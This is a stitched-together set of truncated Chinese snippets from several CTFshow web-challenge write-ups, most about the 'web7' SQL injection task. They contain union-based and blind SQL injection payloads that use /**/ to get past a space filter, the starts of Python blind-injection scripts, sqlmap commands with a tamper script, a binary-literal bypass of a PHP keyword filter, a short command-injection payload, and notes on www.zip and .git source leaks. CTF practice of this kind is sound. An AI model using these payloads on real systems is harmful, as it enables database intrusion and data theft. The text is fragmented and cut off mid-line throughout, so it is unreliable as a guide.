库名web7,表名flag,page,user 很遗憾最后模仿大佬脚本,爆column名没法爆出 最后两步手动 Copyid=-1'/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102# id=-1'/**/or/**/ascii(substr...
由上可知:回显位为2所在位置 爆库:admin' or 1=1 union select 1,database(),3#可知数据库名为web2 爆表:admin' or '1'='1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#可知表名为flag,user 爆字段:admin' or '1'='1' union s...
打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/ind
id=-1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web7'# 没有回显,但是语句没有问题,应该是什么被过滤了,猜测是单引号,我们将单引号替换成双引号: sql ?id=-1/**/union/**/select/**/1,group_concat(table_name)...
[SQL盲注]CTFSHOW---WEB7(二分法快速爆出数据) 这道题是盲注,至于是为什么可以看其他师傅的,我不想多说,只是想记录下我的脚本而已 我的payload分别是查数据库、数据表、列名和爆字段,自己取消注释玩, 然后url前半部分改成你的靶机的url importrequests url...
异或运算被ban,用上一题中的非运算依旧可以过 web7 if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\! |\~(逻辑非)|x|hex|\(|\)|\+|select/i",$id)){ die("id error"); 非运算被ban了,用二进制可以绕过 ?id=0b1111101000...
python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show:8080/index.php?id=1" -D "web7" --tables --tamper "space2comment.py" 1. 找到flag了!!! 爆数据库字段 AI检测代码解析 python sqlmap.py -u "http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.chal...
web签到# 会执行命令,但没有回显 同时js中限制了命令长度<=7 Copy functionisSafe(cmd) {returncmd.length<=7; } 直接用>(重定向符)到任意网址即可 Copy ls/>m 访问m可以下载结果 读flag,cat太长,用nl代替 payload Copy nl/*>m 访问m easy_calc# ...
ctfshow7 web 看到这样的url判断是sql注入 试了几个碰到空格就错误有过滤,看了别的wp是sql注入盲注 过滤了空格符,可以用/**/绕过,抓包 import requests s=requests.session() url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'...
web6 网站源代码泄露 查看提示 提示源码泄露在当前目录,网站服务文件名为WWW,那么访问www.zip,获得压缩包 打开index.php 提示访问fl000g.txt,访问获得flag web7 git泄露 看题目,提示版本控制,即有可能是git泄露 用dirsearch扫一波 居然啥都没找到,最后看hint,提示是在/.git/index.php里,只能说目录文件太常见了...